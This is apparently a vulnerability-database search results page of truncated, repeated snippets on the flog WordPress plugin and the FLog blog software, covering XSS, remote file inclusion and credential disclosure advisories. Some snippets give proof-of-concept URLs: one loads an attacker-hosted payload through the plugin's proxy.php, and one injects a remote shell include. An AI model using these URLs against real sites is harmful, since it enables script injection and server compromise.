CVE-2014-4530

flog plugin 0.1 for WordPress has XSS...

EUVD-2006-0359

Malware in sbrugna...

EUVD-2014-4457

Malware in sbrugna...

WordPress flog cross-site scripting vulnerability

WordPress is a set of blogging platforms developed using the PHP language by the WordPress Foundation. The platform supports setting up personal blog sites on servers with PHP and MySQL. A cross-site scripting vulnerability exists in WordPress flog version 0.1. The vulnerability stems from a lack...

CVE-2014-4530

flog plugin 0.1 for WordPress has XSS...

Cross site scripting

flog plugin 0.1 for WordPress has XSS...

CVE-2014-4530

flog plugin 0.1 for WordPress has XSS...

CVE-2014-4530

CVE-2014-4530 concerns the WordPress flog plugin (version 0.1). The vulnerability is a cross-site scripting (XSS) issue arising from insufficient input validation in the flog plugin, leading to unauthenticated, reflected XSS. Multiple connected sources (Red Hat, CNVD, NVD, CVE lists, and WP explo...

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. PoC https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...

flog112-disclose.txt

-=--------------------ADVISORY-------------------=- FLog 1.1.2 Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: FLog -=+ Version: 1.1.2 -=+ Vendor's URL: http://www.fluffington.com/index.php?page=flog -=+ Platform: Windows\Linux\Unix -=+ Bug...

Flog 1.1.2 Remote Admin Password Disclosure

-=--------------------ADVISORY-------------------=- FLog 1.1.2 Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: FLog -=+ Version: 1.1.2 -=+ Vendor's URL: http://www.fluffington.com/index.php?page=flog -=+ Platform: WindowsLinuxUnix -=+ Bug typ...

Flog.txt

SaVSaK.CoM | SpC-x - The-BeKiR | Flog 1.1.2 Version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : Flog Credits : SpC-x Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke Code : Vulnerable : http://www.victim.com/Flog/config.php?FLogdirinclude=Command-Sh...

Flog 1.1.2 Version - Remote File Include Vulnerabilities

SaVSaK.CoM | SpC-x - The-BeKiR | Flog 1.1.2 Version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : Flog Credits : SpC-x Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke Code : ?php $FLogdirplugins = 'plugins/'; $FLogdirdata = 'data/'; $FLogdirthemes =...

CVE-2006-0352

The default configuration of Fluffington FLog 1.01 installs users.0.dat under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information login credentials via a direct request. NOTE: It was later reported that 1.1.2 is also affected...

CVE-2006-0352

The default configuration of Fluffington FLog 1.01 installs users.0.dat under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information login credentials via a direct request. NOTE: It was later reported that 1.1.2 is also affected...

CVE-2006-0352

The CVE-2006-0352 entry concerns Fluffington FLog 1.01 (also noted for 1.1.2) where the default configuration places users.0.dat under the web document root with insufficient access control, potentially allowing remote retrieval of sensitive information (login credentials) via a direct request. C...

[eVuln] Flog Information Disclosure Vulnerability

New eVuln Advisory: Flog Information Disclosure Vulnerability http://evuln.com/vulns/38/summary/bt/ --------------------Summary---------------- Software: Flog Sowtware's Web Site: http://www.fluffington.com Versions: 1.0.1 Critical Level: Harmless Type: Information Disclosure Class: Remote Status...